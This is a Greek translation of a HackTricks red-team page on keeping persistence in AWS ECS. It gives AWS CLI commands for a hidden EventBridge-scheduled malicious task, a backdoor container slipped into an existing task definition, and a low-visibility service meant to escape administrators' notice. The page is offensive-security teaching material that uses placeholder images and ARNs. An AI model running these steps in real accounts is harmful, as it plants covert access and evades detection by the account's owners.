AWS - ECS Persistence

Μάθετε το χάκινγκ του AWS από το μηδέν μέχρι τον ήρωα με το htARTE (HackTricks AWS Red Team Expert)!

Άλλοι τρόποι για να υποστηρίξετε το HackTricks:

ECS

Για περισσότερες πληροφορίες, ελέγξτε:

AWS - ECS Enum

Κρυφή Περιοδική Εργασία ECS

TODO: Ελέγξτε

Ένας επιτιθέμενος μπορεί να δημιουργήσει μια κρυφή περιοδική εργασία ECS χρησιμοποιώντας το Amazon EventBridge για να προγραμματίσει την εκτέλεση μιας κακόβουλης εργασίας περιοδικά. Αυτή η εργασία μπορεί να πραγματοποιήσει αναγνώριση, εξαγωγή δεδομένων ή διατήρηση της μόνιμης παρουσίας στον λογαριασμό AWS.

# Create a malicious task definition
aws ecs register-task-definition --family "malicious-task" --container-definitions '[
{
"name": "malicious-container",
"image": "malicious-image:latest",
"memory": 256,
"cpu": 10,
"essential": true
}
]'

# Create an Amazon EventBridge rule to trigger the task periodically
aws events put-rule --name "malicious-ecs-task-rule" --schedule-expression "rate(1 day)"

# Add a target to the rule to run the malicious ECS task
aws events put-targets --rule "malicious-ecs-task-rule" --targets '[
{
"Id": "malicious-ecs-task-target",
"Arn": "arn:aws:ecs:region:account-id:cluster/your-cluster",
"RoleArn": "arn:aws:iam::account-id:role/your-eventbridge-role",
"EcsParameters": {
"TaskDefinitionArn": "arn:aws:ecs:region:account-id:task-definition/malicious-task",
"TaskCount": 1
}
}
]'

Πίσω πόρτα Container σε Υπάρχουσα Ορισμού Εργασίας ECS

TODO: Ελέγξτε

Ένας επιτιθέμενος μπορεί να προσθέσει ένα αόρατο πίσω πόρτα container σε έναν υπάρχοντα ορισμό εργασίας ECS που εκτελείται παράλληλα με νόμιμα containers. Το πίσω πόρτα container μπορεί να χρησιμοποιηθεί για την διατήρηση και εκτέλεση κακόβουλων δραστηριοτήτων.

# Update the existing task definition to include the backdoor container
aws ecs register-task-definition --family "existing-task" --container-definitions '[
{
"name": "legitimate-container",
"image": "legitimate-image:latest",
"memory": 256,
"cpu": 10,
"essential": true
},
{
"name": "backdoor-container",
"image": "malicious-image:latest",
"memory": 256,
"cpu": 10,
"essential": false
}
]'

Μη τεκμηριωμένη υπηρεσία ECS

TODO: Ελέγξτε

Ένας επιτιθέμενος μπορεί να δημιουργήσει μια μη τεκμηριωμένη υπηρεσία ECS που εκτελεί μια κακόβουλη εργασία. Ρυθμίζοντας τον επιθυμητό αριθμό των εργασιών σε ένα ελάχιστο και απενεργοποιώντας την καταγραφή, γίνεται πιο δύσκολο για τους διαχειριστές να παρατηρήσουν την κακόβουλη υπηρεσία.

# Create a malicious task definition
aws ecs register-task-definition --family "malicious-task" --container-definitions '[
{
"name": "malicious-container",
"image": "malicious-image:latest",
"memory": 256,
"cpu": 10,
"essential": true
}
]'

# Create an undocumented ECS service with the malicious task definition
aws ecs create-service --service-name "undocumented-service" --task-definition "malicious-task" --desired-count 1 --cluster "your-cluster"
Μάθετε το hacking του AWS από το μηδέν μέχρι τον ήρωα με το htARTE (HackTricks AWS Red Team Expert)!

Άλλοι τρόποι για να υποστηρίξετε το HackTricks:

Last updated